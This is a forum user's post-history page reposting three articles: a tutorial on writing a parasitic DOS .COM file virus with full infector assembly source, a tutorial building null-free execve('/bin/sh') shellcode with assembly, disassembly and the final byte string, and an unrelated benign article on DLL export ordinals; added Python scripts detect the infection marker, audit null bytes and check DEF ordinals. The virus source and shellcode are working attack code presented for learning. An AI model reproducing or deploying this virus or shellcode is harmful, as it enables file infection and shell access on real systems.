Everything posted by Nytro
-
Parasitic Viruses
Author: z3ro

model z3ro
.the parasitic .com infector
org 100h

push disclaimer
I (and the dmz/gny members/staff) take no responsibility for what you do with the knowledge gained from this article. This is for informational purposes only and I do not encourage criminal behavior. If you have a problem with me writing about this topic and think I am a criminal for doing so, I'd like to point out Article 19 of the Universal Declaration of Human Rights, which states: "Everyone has the right to freedom of opinion and expression; this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers."

What's happening this time?
1. Why asm is best for viruses
2. What is a parasitic virus
3. The delta offset and infection
4. fectoid v1.0

;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;
Call Asm_is_the_shit

Now if you have ever seen the source for a virus you would have probably noticed that it is in assembly (90% of the time). Now why would it be in asm? Isn't asm uber hard? Well, asm is a low-level language as it deals very closely with the CPU, OS and memory. This allows you things you couldn't do with C, for example calculating a delta offset (more on this later). When using C it is possible to create a basic overwriting virus. But these are lame and probably wouldn't work in this day and age due to protected mode.

ret
;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;
Call parasitic

Ok so what is a parasitic virus? It is quite different from an overwriting virus as it does not damage the host program. There are two main methods of doing this. We must first place a jump at the start of our host to our virus. We must then calculate the offset to the end of the host and place our virus there. We must also make sure that we do return control back to the host, or else we risk suspicion and errors.

There are two main methods of writing a parasitic virus (DOS): we could append to the front of the code or at the end. The front tends to be a little faster though it is much more complicated. The second method is to append at the end and that is what we are going to cover here.

retn
;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;
Call infect

Ok so you heard all the theory, time for some code. When writing a parasitic virus you first need to calculate the delta offset. This is very easy to do but it is also a very important step:

    call next
next:
    pop di
    sub di,offset next

Now we have the offset that points to our code. Another very important part of a virus is the find mechanism. This is also very easy as all we have to do is use function 4eh of interrupt 21h.

masker db "*.com",0
    lea dx,[bp+offset masker]
    mov ah,4eh
    etc...

Ok so we have found our unwilling host. But how do we know if we haven't infected him already? We simply read the first few bytes and compare them to a string (which usually consists of a jmp to our code).

    mov ax,3d02h
    lea dx,[bp+offset dta+30]
    mov cx,3
    int 21h
    xchg ax,bx
    int 21h
    mov ax,word ptr [bp+dta+26]
    mov cx,word ptr [bp+ID+1]
ID db "lalala",0

And now the moment you have all been waiting for: INFECTION!!!! Which is in fact extremely simple. We first must set up the jmp to our code and then our ID string, then write them to the front of the host. We do however have to use function 4200h, which is straightforward.

    mov ah,40h
    mov cx,3
    lea dx,[bp+jmpz+ID]
    int 21h
jmpz db 0e9h ; jmp to start of virus code
ID   db 20h,20h,0

We then reset the file pointer and write the rest.

    mov ah,40h
    mov cx,eov-offset start_virus
    lea dx,[bp+offset start_virus]
    int 21h

We have just gone through the basic methods of a parasitic virus. We have only discussed how to infect a .com file. In the next article we will cover DOS .EXEs and a little PE (I still can't infect them properly) file infection.

ret
;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~;
push v1.0
call fectoid

Alright, well I threw together some basic code for this article. It IS VERY basic. It only covers what we have discussed in this article. Now it is very poorly done tbh but I feel it's very easy to learn from. Keep in mind I only spent about 20 min working on it, but you can laugh if you want. I'd also like to point out that none of these viruses will work on windoze. The techniques are similar but now you can't simply overwrite a file and get away with it. Learning how to do this is the first step. Sooner or later I'll get into PE infection which is MUCH MUCH more complicated. Anyways I hope you enjoy; I'll post a better version sometime soon, with an infection checking system that actually works and better coding in general. Enjoy.

.model small
org 100h
.code
.startup
Vic   db "*.com",0
dta   db 42 dup (?)
junk  db 41h,41h,0
leap  db 0e9h,41h,0
_fect db ?

; here we set up offsets and the like
start:
    db 0e9h
    dw 0
do:
    call next
next:
    pop di
    sub di,offset next
    lea si,[bp+offset junk]
    mov di,100h
    push di
    movsw
    movsb
    mov _fect,5               ; up to 5 infections per run

; set up dta to match our delta or else bad things will happen....
    lea dx,[bp+offset dta]
    call DTA_set

find_first:
    mov ah,4eh
    lea dx,[bp+offset vic]
    int 21h
    call ok
find_next:
    mov ah,4fh
    int 21h
    call ok
    jc quit
    jmp find_next

; here we make sure the file is a .com file and check for previous infections
ok:
    mov ax,3fh
    lea dx,[bp+offset dta+30]
    mov cx,3
    int 21h
    xchg ax,bx
    int 21h
    mov ax,word ptr [bp+dta+26]
    mov cx,word ptr [bp+junk+1]
    add cx,eov-do+3
    cmp ax,cx
    sub ax,3
    mov word ptr [bp+buff],ax
    xor al,al
    call file_
    mov ah,40h
    mov cx,3
    lea dx,[bp+leap]
    int 21h
    mov al,2
    call file_
    mov ah,40h
    mov cx,eov-do
    lea dx,[bp+do]
    int 21h
close:
    mov ah,3eh
    int 21h
    dec _fect
    cmp _fect,0
    jnz find_next
    jmp host

host:
    mov dx,80h
    int 21h
    mov di,100h
    jmp di

quit:
    mov ax,4c00h
    int 21h

; sets the dta duh...
dta_set:
    mov ah,1ah
    int 21h
    retn

; this sets up and returns our file pointer
file_:
    mov ah,42h
    xor cx,cx
    xor dx,dx
    int 21h

eov equ $
buff dw ?
END
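Added example, not part of z3ro's article: a defender-side check in Python for the two artefacts the infection routine above leaves in a host, the 0E9h near jmp written over the first three bytes and the ID bytes after it. The marker value (the article's sample 20h,20h,0), its position right after the jmp, and the sample .COM images are constructed assumptions.

```python
"""Heuristic check for the append-style .COM infection described above.

Added example, not part of the original article. It decodes the leading
'jmp rel16' a .COM host receives and looks for the ID bytes the article
writes after it. Assumptions: the marker is the article's sample 20h,20h,0
and sits right after the 3-byte jmp; the sample images below are
constructed by hand and contain no virus body.
"""
import struct

COM_LOAD = 0x100            # .COM images are loaded at CS:0100h
MARKER = b"\x20\x20\x00"    # assumed ID bytes, taken from the article's sample


def jmp_target(data: bytes):
    """File offset reached by a leading E9 rel16 jmp, or None if there is none."""
    if len(data) < 3 or data[0] != 0xE9:
        return None
    rel = struct.unpack_from("<h", data, 1)[0]   # signed 16-bit displacement
    ip = COM_LOAD + 3 + rel                       # relative to the next instruction
    return ip - COM_LOAD                          # back to a file offset


def scan_com(data: bytes, marker: bytes = MARKER) -> dict:
    """Describe the entry jmp and marker of one .COM image."""
    report = {"entry_jmp": False, "target": None, "in_file": False, "marker": False}
    target = jmp_target(data)
    if target is None:
        return report
    report["entry_jmp"] = True
    report["target"] = target
    report["in_file"] = 0 <= target < len(data)
    report["marker"] = data[3:3 + len(marker)] == marker
    return report


def suspicious(report: dict) -> bool:
    """A jmp at entry is common in clean .COM files; insist on the marker too."""
    return report["entry_jmp"] and report["in_file"] and report["marker"]


# Constructed samples (no virus body, just the shape the article produces).
# 1) clean host: mov ah,9 / mov dx,010Eh / int 21h / ret / "Hello$"  (14 bytes)
CLEAN = b"\xb4\x09\xba\x0e\x01\xcd\x21\xc3Hello$"
# 2) the same host after infection: jmp to offset 14 (rel16 = 14 - 3 = 000Bh),
#    marker over bytes 3..5, then 40 filler bytes standing in for the appended code
INFECTED = b"\xe9\x0b\x00" + MARKER + CLEAN[6:] + b"\x90" * 40
# 3) a clean program that merely jumps over its own data: must not be flagged
JMP_OVER_DATA = b"\xe9\x06\x00" + b"Hello$" + b"\xb4\x09\xba\x03\x01\xcd\x21\xc3"
# 4) a jmp whose target lies outside the file: reported, but not flagged
BAD_JMP = b"\xe9\xff\x7f" + b"\x00" * 4

if __name__ == "__main__":
    for name, img in [("CLEAN", CLEAN), ("INFECTED", INFECTED),
                      ("JMP_OVER_DATA", JMP_OVER_DATA), ("BAD_JMP", BAD_JMP)]:
        r = scan_com(img)
        print(f"{name:14} {r} -> {'SUSPICIOUS' if suspicious(r) else 'ok'}")
```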
-
Shellcoding with Direct Stack Usage - h0yt3r

###SHELLCODING WITH DIRECT STACK USAGE###
~by h0yt3r

Hai

This is an example of how to produce null-byte-less shellcode out of a simple assembler code with two methods of stack usage. I will start with an example which shows how to execute a bourne shell in assembler (nasm):

------------bla.asm
section .data
    binsh db '/bin/sh',0    ;save '/bin/sh' string at data section

section .text
global _start
_start:
    mov eax,11      ;syscall execve
    mov ebx,binsh   ;move the '/bin/sh' string address into ebx
    push 0          ;as the next argument (*const argv[]) is an array
    push binsh      ;we will need to save it on the stack and null-terminate it
    mov ecx,esp     ;then put the first address of the stack into ecx
    mov edx,0       ;no *const envp[]
    int 0x80        ;kernel call
;eof
------------

Okay we will assemble and link this code:

h0yt3r@Cain:~/Desktop$ nasm -f elf bla.asm
h0yt3r@Cain:~/Desktop$ ld -o bla bla.o
h0yt3r@Cain:~/Desktop$ ./bla
sh-3.2$ exit
exit

Works fine. Let's have a look at the objdump.

h0yt3r@Cain:~/Desktop$ objdump -D bla

bla:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:   b8 0b 00 00 00          mov    $0xb,%eax
 8048085:   bb a0 90 04 08          mov    $0x80490a0,%ebx
 804808a:   68 00 00 00 00          push   $0x0
 804808f:   68 a0 90 04 08          push   $0x80490a0
 8048094:   89 e1                   mov    %esp,%ecx
 8048096:   ba 00 00 00 00          mov    $0x0,%edx
 804809b:   cd 80                   int    $0x80

Disassembly of section .data:

080490a0 <binsh>:
 80490a0:   2f                      das
 80490a1:   62 69 6e                bound  %ebp,0x6e(%ecx)
 80490a4:   2f                      das
 80490a5:   73 68                   jae    804910f <__bss_start+0x67>
        ...

Disassembly of section .comment:

00000000 <.comment>:
   0:   00 54 68 65             add    %dl,0x65(%eax,%ebp,2)
   4:   20 4e 65                and    %cl,0x65(%esi)
   7:   74 77                   je     80 <_start-0x8048000>
   9:   69 64 65 20 41 73 73    imul   $0x65737341,0x20(%ebp,%eiz,2),%esp
  10:   65
  11:   6d                      insl   (%dx),%es:(%edi)
  12:   62 6c 65 72             bound  %ebp,0x72(%ebp,%eiz,2)
  16:   20 32                   and    %dh,(%edx)
  18:   2e 30 35 2e 30 31 00    xor    %dh,%cs:0x31302e
h0yt3r@Cain:~/Desktop$

As we can see, this code needs more than one section for execution. It is also full of 0-bytes, which is kinda evil for later shellcode since 0-bytes are treated as a string terminator when it is passed as a parameter, for example.

A _useful_ asm code _without_ different sections and _without_ 0-bytes for later shellcode using the call technique:

------------bla2.asm
section .text
global _start
_start:
    jmp short two       ;we short jump to two for saving '/bin/sh' on the stack (look at two now)

one:
    pop ebx             ;as the return address is saved on top of the stack and points to '/bin/sh',
                        ;it is just popped from the stack and saved into ebx (char *path)
                        ;ok the address of '/bin/shX' is saved in ebx now. the X will represent the null terminating byte
    xor eax,eax         ;0-out eax
    mov byte [ebx + 7],al   ;this instruction replaces the X with the value of al
                        ;(count seven bytes up the data to which ebx is pointing and put a null there) => null-terminate /bin/sh
                        ;this will also only work if the shellcode is saved on the stack (eg when it's injected into a
                        ;vulnerable programme since we only have write access there)
    push eax            ;=> push 0 for null termination of '/bin/sh'
    push eax            ;restore ebx at the stack so that the stack pointer points to null-terminated '/bin/sh'
    mov ecx,esp         ;stack pointer into ecx (*const argv[])
    mov edx,esp         ;same to edx (*const envp[])
                        ;we could also say 'mov edx,0' but this would just produce another 0-byte
    mov al,11           ;syscall execve
    int 0x80            ;make the kernel call

two:
    call one            ;on execution we directly jump here and make a call _upwards_ again.
                        ;_upwards_ is important. a call allows much longer jump distances, so if we make a call downwards
                        ;with a value of 10 for example, the rest of the value would be filled with 0-bytes.
                        ;so when we call upwards, we are passing a negative number as value
                        ;(leading to 0xff...) which will not contain any 0-bytes.
    db '/bin/shX'       ;when making a call, the address of the next instruction is pushed onto the stack and will be
                        ;treated as return address. This tells the processor where execution flow has to be continued when function
                        ;'one' is finished. in this case, the return address will just point to the '/bin/sh' string.
;eof
------------

Let's look at the objdump again

h0yt3r@Cain:~/Desktop$ nasm -f elf bla2.asm
h0yt3r@Cain:~/Desktop$ ld -o bla2 bla2.o
h0yt3r@Cain:~/Desktop$ objdump -d bla2
h0yt3r@Cain:~/Desktop$ objdump -d foo

foo:     file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
 8048060:   eb 10                   jmp    8048072 <two>

08048062 <one>:
 8048062:   5b                      pop    %ebx
 8048063:   31 c0                   xor    %eax,%eax
 8048065:   88 43 07                mov    %al,0x7(%ebx)
 8048068:   50                      push   %eax
 8048069:   50                      push   %eax
 804806a:   89 e1                   mov    %esp,%ecx
 804806c:   89 e2                   mov    %esp,%edx
 804806e:   b0 0b                   mov    $0xb,%al
 8048070:   cd 80                   int    $0x80

08048072 <two>:
 8048072:   e8 eb ff ff ff          call   8048062 <one>
 8048077:   2f                      das
 8048078:   62 69 6e                bound  %ebp,0x6e(%ecx)
 804807b:   2f                      das
 804807c:   73 68                   jae    80480e6 <two+0x74>
 804807e:   58                      pop    %eax
h0yt3r@Cain:~/Desktop$

We can see that our code doesn't produce any 0-bytes anymore, so now we could perfectly use it as shellcode.

Okay, now an imo more elegant way of code with direct stack usage without calls and jumps:

------------bla3.asm
section .text
global _start
_start:
    xor eax,eax         ;0-out eax
    push eax            ;put 0 onto stack for null-terminating
    push 0x68732F2F     ;put '/bin/sh' onto stack
    push 0x6E69622F     ;actually it is 'hs//nib/' since the string has to be pushed in reversed order.
                        ;we are also using two '/' cos our data needs to stay directly at the 8 byte bound, for not producing 0-bytes
    mov ebx,esp         ;stack pointer (/bin/sh) to ebx (char *path)
    push eax            ; => push 0
    push eax            ;put ebx onto stack
    mov ecx,esp         ;since ecx needs null-terminated *const argv[] which is same as ebx
    mov edx,esp         ;*const envp[] whatever
    mov al,11           ;syscall execve
    int 0x80            ;fire
;eof
------------

Assembling, linking:

h0yt3r@Cain:~/Desktop$ nasm -f elf bla3.asm
h0yt3r@Cain:~/Desktop$ ld -o bla2 bla3.o
h0yt3r@Cain:~/Desktop$ ./bla3
sh-3.2$ exit
exit
h0yt3r@Cain:~/Desktop$ objdump -d bla3

bla3:     file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   50                      push   %eax
 8048063:   b0 0b                   mov    $0xb,%al
 8048065:   68 2f 2f 73 68          push   $0x68732f2f
 804806a:   68 2f 62 69 6e          push   $0x6e69622f
 804806f:   89 e3                   mov    %esp,%ebx
 8048071:   52                      push   %edx
 8048072:   53                      push   %ebx
 8048073:   89 e1                   mov    %esp,%ecx
 8048075:   89 e2                   mov    %esp,%edx
 8048077:   cd 80                   int    $0x80
h0yt3r@Cain:~/Desktop$

This looks even better, doesn't it? Now use it! I'll take katharsis' extractor; it's nothing special but kinda useful.

h0yt3r@Cain:~/Desktop$ perl shellgen.pl bla3
[*] shellcode generator
[*] written by katharsis
[*] www.katharsis.x2.to
[*] nebelfrost23@web.de
[^] generating opcode...
[^] generating shellcode...
[^] formating shellcode
[^] done, here you are:
\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x89\xe2\xcd\x80
h0yt3r@Cain:~/Desktop$
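As an added example that is not part of h0yt3r's post, this Python script reproduces the displacement arithmetic behind the "call upwards" remark using the addresses from the objdump above, and audits the listed byte strings for 0-bytes the way a reviewer would check a candidate payload before it is ever passed through a C string function.

```python
"""Why the upward call in bla2.asm contains no 0-bytes, and a null-byte audit
of the listings above. Added example, not part of h0yt3r's post; the
addresses and bytes are copied from the post's objdump output.
"""
import struct


def call_rel32(call_addr: int, target: int) -> bytes:
    """Encode 'call target' (E8 + signed 32-bit displacement) placed at call_addr.
    The displacement is measured from the next instruction, 5 bytes further on."""
    disp = target - (call_addr + 5)
    return b"\xe8" + struct.pack("<i", disp)


def null_positions(code: bytes) -> list:
    """Indices of 0x00 bytes; any of them would end a C string copy early."""
    return [i for i, b in enumerate(code) if b == 0]


def parse_escaped(s: str) -> bytes:
    """Turn a '\\x31\\xc0...' string, as printed by shellgen.pl, into bytes."""
    return bytes(int(p, 16) for p in s.split("\\x")[1:])


# bla2: 'two' at 0x8048072 calls 'one' at 0x8048062, i.e. backwards.
UPWARD = call_rel32(0x8048072, 0x8048062)
# The post's counter-example: a call 10 bytes forward from the same place.
DOWNWARD = call_rel32(0x8048072, 0x8048072 + 5 + 10)

# Opcode bytes of bla.asm's .text from the first objdump (mov eax,11 ... int 0x80).
BLA1_TEXT = bytes.fromhex(
    "b80b000000 bba0900408 6800000000 68a0900408 89e1 ba00000000 cd80")
# bla3 as emitted by shellgen.pl.
SHELLCODE = parse_escaped(
    r"\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    r"\x89\xe3\x52\x53\x89\xe1\x89\xe2\xcd\x80")

if __name__ == "__main__":
    print("upward call  :", UPWARD.hex(" "), "nulls at", null_positions(UPWARD))
    print("downward call:", DOWNWARD.hex(" "), "nulls at", null_positions(DOWNWARD))
    print("bla.asm .text:", len(BLA1_TEXT), "bytes, nulls at", null_positions(BLA1_TEXT))
    print("bla3 shellcode:", len(SHELLCODE), "bytes, nulls at", null_positions(SHELLCODE))
```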
-
A Crash Course In Exporting From A DLL With A Detailed Look At The DEF File
Using Visual C++ Professional 6.0
By: George Chastain
Date: 7/21/2000

When creating a new DLL, an Import Library (with a ".LIB" extension) is created. This Import Library has to remain consistent with the DLL used to create the library -- at least for the code utilized by the client. Occasionally, you may find yourself delivering multiple products to multiple customers and some of these products may share a particular DLL. But what happens if a customer obtains a new version of one of those products but doesn't obtain new versions of the other products that use that particular DLL? It is possible that the new version of the DLL delivered with the new product could break the other, older product that the customer already has. This can happen if information contained within the new version of the DLL becomes inconsistent with the information recorded for the DLL by the Import Library used to link the other, older products. Before describing how to help alleviate some of the possibility of this occurring, we will take a brief look at what an Import Library contains.

The Import Library

The Import Library does not contain any code. It may be thought of as a "road map" to the functions, classes and other declarations provided by the DLL. When linking a client of a DLL, the Linker needs to record the information contained in this "road map" in the client that will use the DLL. That information will allow the client to locate the things provided, or exported, by the DLL. See Figure 1.

Figure 1 DLL And Import Library

When a client of a DLL references something exported by the DLL, the client utilizes the information obtained by linking with the Import Library to find the item being referenced in the DLL. There is no actual code or resources in the Import Library. All of that is contained in the DLL. The Import Library just tells the client of the DLL where to find the things that the client needs from the DLL.

Figure 2 Client Links To Import Library

But just how does a client find the stuff provided by the DLL?

Names And Numbers

When the Linker links a DLL, it assigns unique names and identifying numbers to all the exported items, whether functions, classes or data. For C++ functions and classes, the unique names are called Decorated Names. And the unique numbers assigned to the exported items are called Ordinals.

Earlier, I mentioned a potential problem in which the Import Library used to link a client can become "inconsistent" with a newer version of the DLL associated with that Import Library. To explain what happens, we will take a look at two examples. I will not go into detail on how to create a DLL using Visual C++. If you do not know how to do this you should review the subject in the MSDN library or any book on Visual C++ programming.

The first example we will look at exports in the conventional manner that most developers are familiar with. I have created a DLL project called ExportDemoDLL1. In that project I created a header file called MyFunctions.h. The contents are shown in Figure 3.

Figure 3 ExportDemoDLL1 MyFunctions.h

Notice that the DLL exports two functions using the "__declspec(dllexport)" directive and a class using the AFX_EXT_CLASS macro. Currently, the AFX_EXT_CLASS macro is simply defined to be AFX_CLASS_EXPORT by the Microsoft header file AFXV_DLL.h if a DLL is being built. AFX_CLASS_EXPORT, currently, is itself defined to be __declspec(dllexport). If an executable is being built, Microsoft defines the AFX_EXT_CLASS macro as AFX_CLASS_IMPORT which, in turn, is declared as "__declspec(dllimport)". You may occasionally see classes written by developers that make use of AFX_CLASS_EXPORT or __declspec directly. However, you are encouraged to use the proper macro AFX_EXT_CLASS when creating a class to export in case Microsoft changes the way in which class exports must be made in a future version of Visual Studio/Visual C++.

You will also notice the use of a preprocessor directive "_EXPORTING". This, together with the use of AFX_EXT_CLASS, makes it easy for you to create a single header file for use by the DLL project to export functions and data and for use by the client project to import the functions and data. This helps eliminate the need to maintain two separate header files. When you build your DLL, specify the preprocessor directive /D "_EXPORTING" in the list of compiler options. Do not do this when building the client and you will be able to use the same header file.

When the ExportDemoDLL1.dll is built, the exports are translated into Decorated Names and Ordinal Numbers as shown highlighted in the "Export Function List View" windowpane of Dependency Walker:

Figure 4 Export Function List View of Dependency Walker

The "Export Function List View" windowpane has two columns of interest to us. The first is labeled "Ordinal". This is the unique Ordinal Number assigned to the exported function. The other column of interest is labeled "Function" and it shows the unique Decorated Name given to the exported function within the DLL. The client makes use of this information when locating the functions. The functions are defined as shown in Table 1.

***See source***

Later, I will explain how to obtain the Decorated Names for items you wish to export and how to convert Decorated Names to Undecorated Names.

You will notice in Figure 3 above that the class method CMyClass::SAbout() is implemented within the class declaration. That is, the body is defined in the class declaration instead of within the CPP file for the class. When you fully define a class method within the class declaration, it is normally treated as an inline function. However, when you export an inline function with __declspec(dllexport), the inline function is always instantiated and exported, whether or not any module in the client program references the function. The function is presumed to be imported by another program. When you export an entire class using the AFX_EXT_CLASS macro as illustrated above you are, in effect, exporting the inline function SAbout(). This is why you see the method listed as an exported function in the "Export Function List View" of Dependency Walker in Figure 4 above.

Now, assume that we have built a client application that makes use of this ExportDemoDLL1 DLL. Then we decide later to add a new function to the DLL and export it. We will try this and add a function called Sub() as shown in the new version of the header file in Figure 5.

Figure 5 New Version of MyFunctions.h

We now build the new version of the DLL and take a look at the exports in Dependency Walker:

Figure 6 New Version of ExportDemoDLL in Dependency Walker

Look at what happened to the exported function Sum(). Its Ordinal Number is now 8 where it was 7 in the previous version of ExportDemoDLL1.DLL. If we do not re-link the client application with the Import Library created when building the new version of ExportDemoDLL1.DLL, the application will be looking for the function Sum() in the wrong location in the DLL!! The results are unpredictable and typically catastrophic. Further, you usually will have no clue as to why the executable crashed! You could spend a lot of time trying to debug this one.

Now that we understand the problem, what can we do about it? The answer is to explicitly define Ordinals for the exported functions so that the exported functions will always receive the same ordinals on every release of the DLL.

Defining Ordinals -- The DEF Way

For the next part of the discussion, we will assume that a new DLL project has been created. I will refer to it as ExportDemoDLL2. When you use the Visual C++ AppWizard to create a new DLL project, the wizard creates a file called the Module Definition File. The file has a ".DEF" extension and contains information similar to that shown in the example in Figure 7.

Figure 7 Default DEF File

We will be making some additions to the contents of this file. But before we do, we need to remove the export directives and macros from the header file MyFunctions.h that was created for our first example, ExportDemoDLL1. The header file for our new example DLL is shown in Figure 8. We haven't added the function Sub() yet. We will do that shortly.

Figure 8 New MyFunctions.h For ExportDemoDLL2

Now that we no longer state that we want the entire class CMyClass exported in the header (because we removed the AFX_EXT_CLASS macro), you must add export directives to the DEF file. The required entries for the DEF file for ExportDemoDLL2 are shown in Figure 9. Again, we will add our function Sub() shortly.

Figure 9 New DEF File

I have explicitly assigned ordinals to the exported functions. They are shown after the decorated names following the "@" sign. Text appearing to the right of a semi-colon is treated as a comment. The line containing the keyword LIBRARY specifies the internal name of the DLL. The line containing the keyword DESCRIPTION defines a string to be written into an .rdata section of the DLL. This description is different from the text inserted in the library by the Linker's /COMMENT option.

Now we are ready to build the new version of our DLL. But what happens now?! We get an unresolved external symbol error from the Linker! See Figure 10.

Figure 10 Unresolved External Symbol

I mentioned above that because we were exporting an entire class with AFX_EXT_CLASS, the inline methods are always expanded and exported just like any other class method whose implementation is provided in a CPP file. But now we have removed the AFX_EXT_CLASS macro from the class declaration. The inline method CMyClass::SAbout() will now remain treated as an inline function. You cannot export an inline function because there is nothing to export. There are two solutions to this situation.

Option 1

We may remove the definition for CMyClass::SAbout() from the header file and place it in the CPP file MyFunctions.cpp. The new header file will then appear as shown in Figure 11.

Figure 11 MyFunctions.h Without Method Definition

When we do this we can successfully build the DLL and examine it in Dependency Walker. You will notice that the method SAbout() is listed as an exported function in the "Export Function List View" windowpane just as it was before.

Figure 12 ExportDemoDLL2 With Non-Inlined Method Exported

Option 2

Or, we may simply remove the export line for the member function SAbout from the DEF file. In this case MyFunctions.h will remain as shown in Figure 8. The DEF file would then appear as shown in Figure 13. And since the header file MyFunctions.h will be included in source code that references the DLL, the method CMyClass::SAbout() will continue to be treated as an inline function. But there is a "gotcha" with this implementation so I recommend that you use the first implementation. I will explain why later when I discuss the pitfalls of using DEF Files.

Figure 13 DEF File Without Inlined Class Method

But for now, notice that in the "Ordinal" column of the "Export Function List View" windowpane the exported functions are assigned the ordinals I defined in the DEF file. Ordinal numbers may be any number between 1 and 65,535 inclusive. Ordinal numbers 4 and 5 are skipped in the DEF file for the example ExportDemoDLL2 so Dependency Walker displays them with no export entry. As a matter of good practice, you should number your exports sequentially.

Now, let us see what happens when we add the function Sub() to this new DLL project like we did in the example ExportDemoDLL1. I modified the header file to appear as shown in Figure 14. Note that I am going with the first option in the implementation of the method CMyClass::SAbout().

Figure 14 New MyFunctions.h With Function Sub()

Then, I modified the DEF file as follows:

Figure 15 New DEF File With Export Entry For Function Sub()

After building ExportDemoDLL2 again, we can re-examine the DLL using Dependency Walker.

Figure 16 ExportDemoDLL2 In Dependency Walker With Function Sub()

We now see the export for the function Sub() at the top of the "Export Function List View" windowpane of Dependency Walker with the assigned ordinal of 1. Notice that the ordinals for the other exported functions are unchanged from those shown in Figure 12 above. If I were to now place this new DLL (with the added function Sub()) from the example project ExportDemoDLL2 with an application linked with the Import Library produced by the version of ExportDemoDLL2 created before function Sub() was added, the executable would still run successfully. The newly added function Sub() would simply be ignored by the application.

Exporting Global Variables

Exporting global variables is just as easy as exporting functions. They will also be listed in the "Export Function List View" windowpane of Dependency Walker along with the functions and class methods that are exported. The only thing to remember is not to define the global in a header file that is included in both the DLL and your client or you will get an error from the Linker that the symbol is multiply defined. As with the functions, you can export a global variable in two ways. The first method of exporting a global is to add a line to the header file as shown in MyFunctions.h in Figure 17. Then, in a CPP file of your DLL project, define the global variable as you would any global variable.

.................................................................................

Source (full article): How To Define And Use DLL Export Ordinals
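The ordinal drift the article demonstrates with Dependency Walker can be caught before a release ships by diffing the EXPORTS sections of the old and new DEF files. The following Python checker is an added example, not code from the article; the two DEF texts are constructed, and the decorated names in them are illustrative placeholders rather than the real ExportDemoDLL2 exports.

```python
"""Check that a new DEF file keeps the ordinals of the previous release.

Added example, not from the article. It parses the EXPORTS section of two
Module Definition Files in the 'name @ordinal ; comment' form the article
describes and reports what would break an already-linked client: an export
whose ordinal moved, an ordinal now attached to a different export, and an
export that disappeared. Both DEF texts are constructed; the decorated
names are illustrative, not the article's real ExportDemoDLL2 exports.
"""

_SECTION_KEYWORDS = {"LIBRARY", "NAME", "DESCRIPTION", "EXPORTS", "SECTIONS",
                     "STACKSIZE", "HEAPSIZE", "VERSION"}
_ENTRY_FLAGS = {"NONAME", "PRIVATE", "DATA"}


def _parse_entry(line: str):
    """'name[=internal] [@ordinal] [NONAME] [PRIVATE] [DATA]' -> (name, ordinal|None)."""
    tokens = line.split()
    name = tokens[0].split("=", 1)[0]
    ordinal = None
    for tok in tokens[1:]:
        if tok.startswith("@") and tok[1:].isdigit():
            ordinal = int(tok[1:])
            if not 1 <= ordinal <= 65535:            # range stated in the article
                raise ValueError(f"ordinal out of range for {name}: {ordinal}")
        elif tok.upper() not in _ENTRY_FLAGS:
            raise ValueError(f"unrecognised token {tok!r} in EXPORTS line {line!r}")
    return name, ordinal


def parse_def_exports(text: str) -> dict:
    """Map export name -> ordinal (None if the DEF left it to the Linker)."""
    exports, in_exports = {}, False
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # text after ';' is a comment
        if not line:
            continue
        head = line.split()[0].upper()
        if head in _SECTION_KEYWORDS:
            in_exports = head == "EXPORTS"
            continue
        if in_exports:
            name, ordinal = _parse_entry(line)
            exports[name] = ordinal
    return exports


def ordinal_changes(old_text: str, new_text: str) -> dict:
    old, new = parse_def_exports(old_text), parse_def_exports(new_text)
    old_by_ordinal = {o: n for n, o in old.items() if o is not None}
    return {
        "moved": {n: (old[n], new[n]) for n in old if n in new and old[n] != new[n]},
        "reused": {o: (old_by_ordinal[o], n) for n, o in new.items()
                   if o in old_by_ordinal and old_by_ordinal[o] != n},
        "dropped": sorted(n for n in old if n not in new),
        "unnumbered": sorted(n for n, o in new.items() if o is None),
        "added": sorted(n for n in new if n not in old),
    }


def def_is_compatible(old_text: str, new_text: str) -> bool:
    """True when a client linked against the old Import Library keeps working."""
    c = ordinal_changes(old_text, new_text)
    return not (c["moved"] or c["reused"] or c["dropped"] or c["unnumbered"])


# Constructed DEF files modelled on the article's ExportDemoDLL2 (names illustrative).
OLD_DEF = """
LIBRARY      "ExportDemoDLL2"
DESCRIPTION  'ExportDemoDLL2 Windows Dynamic Link Library'

EXPORTS
    ; Explicit exports can go here
    ?Sum@@YAHHH@Z              @2      ; int Sum(int, int)
    ?Product@@YAHHH@Z          @3      ; int Product(int, int)
    ?SAbout@CMyClass@@SAXXZ    @6      ; static void CMyClass::SAbout()
    ?g_nCount@@3HA             @7 DATA ; exported global
"""

# Sub() added the way the article recommends: a free ordinal, nothing else touched.
NEW_DEF_OK = OLD_DEF.replace(
    "EXPORTS\n", "EXPORTS\n    ?Sub@@YAHHH@Z              @1      ; int Sub(int, int)\n")

# Sub() squeezed in and the rest renumbered, with the global forgotten:
# the silent renumbering the article shows for ExportDemoDLL1, done by hand.
NEW_DEF_BAD = """
LIBRARY      "ExportDemoDLL2"
EXPORTS
    ?Sub@@YAHHH@Z              @2
    ?Sum@@YAHHH@Z              @3
    ?Product@@YAHHH@Z          @4
    ?SAbout@CMyClass@@SAXXZ    @6
"""

if __name__ == "__main__":
    for label, new in (("ok", NEW_DEF_OK), ("bad", NEW_DEF_BAD)):
        verdict = "compatible" if def_is_compatible(OLD_DEF, new) else "BREAKS clients"
        print(label, verdict, ordinal_changes(OLD_DEF, new))
```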
-
So should I ban 85% of the forum's active users?
-
Google shows off the new Chrome OS and its accompanying notebook
Nytro posted a topic in Security news

Google shows off the new Chrome OS and its accompanying notebook
by Silviu Anton | 8 December 2010

